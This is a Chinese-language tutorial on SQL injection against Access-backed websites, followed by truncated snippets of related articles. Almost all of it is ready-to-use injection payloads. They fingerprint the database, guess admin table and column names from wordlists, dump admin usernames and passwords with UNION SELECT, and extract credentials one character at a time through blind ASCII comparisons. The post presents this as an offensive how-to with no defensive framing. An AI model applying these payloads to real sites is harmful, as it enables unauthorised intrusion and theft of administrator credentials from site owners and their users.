access資料庫注入詳解
一:判斷資料庫:1.access:and exists (select * from msysobjects)>0
2.sqlserver:and exists (select * from sysobjects)>0
二:判斷資料庫中的表:and exsits (select * from admin_user) //最後的admin_user是表名
常見access資料庫的管理員表名 admin admin_user admin_msg admin_usr admin_login username mangager mangag msg_user mag_login useradmin user_msg userlogin users member !!!
三 判斷資料表中的列:and exsits (select admin from admin) //最後的admin_user是表名,中間的admin是列名。
常見的管理員表下的列名 admin admin_user admin_login users usr user_login user_name name loginame msg_name!!!
常見的密碼列名 password pwd pass user_pass
四 查詢列數: order by 7 //最後7為列數,當 order by >= 7 的時候會返回頁面
聯合查詢:union select 1,2,3,4,5,6,7from admin//order by查到多少列就寫多少列 admin是表名
五:爆表中列的資料: union select 1,2,admin,4,password,5,6,7 from admin
六 :判斷賬戶密碼的長度
1 and (select len(admin) from admin)= 5//如果返回正常說明管理員賬戶長度為5;
2 and (select len(password)from admin)= 5//猜解管理密碼是否為5;
七:猜解管理員賬號的第乙個資料,通過判斷ascii碼來判斷
and (select top 1 asc(mid(admin,1,1)) from admin)=97 返回正常說明等於97 97對應的字母為a
判斷管理員賬戶的第二資料
and (select top 1 asc(mid(admin,2,1)) from admin)>100
以此類推
and (select top 1 asc(mid(password,1,1)) from admin)>100 返回正常說明大於,不正常說明不大於
ACCESS資料庫注入詳解
asp鏈結access資料庫 driver dbq mdb uid admin pwd pass dim conn set conn server.createobject adodb.connection access注入原理 判斷注入點 and 1 1 and 1 2 0 1 判斷資料庫注入 a...
Access資料庫注入方法
檢測注入型別 1.數字型 and 1 1 返回正常頁面 and 1 2 返回錯誤頁面或者和1 1返回的頁面不同 2.字元型 and 1 1 and 返回正常頁面 and 1 2 and 返回錯誤頁面或者和1 1返回的頁面不同 3.搜尋型 and 1 1 and 返回正常頁面 and 1 2 and ...
ACCESS資料庫的注入
access資料庫的注入access資料庫的注入與mssql不同,要得到表名,字段,以及欄位的內容不能用mssql 暴 的方法直接得 到,access只能用猜解出表名和字段,然後再猜解出字段的長度,最後把字段的內容從第一位到第n位乙個個猜 解出來,採用的猜解方法類似玩乙個遊戲猜大小,比如乙個數字,猜...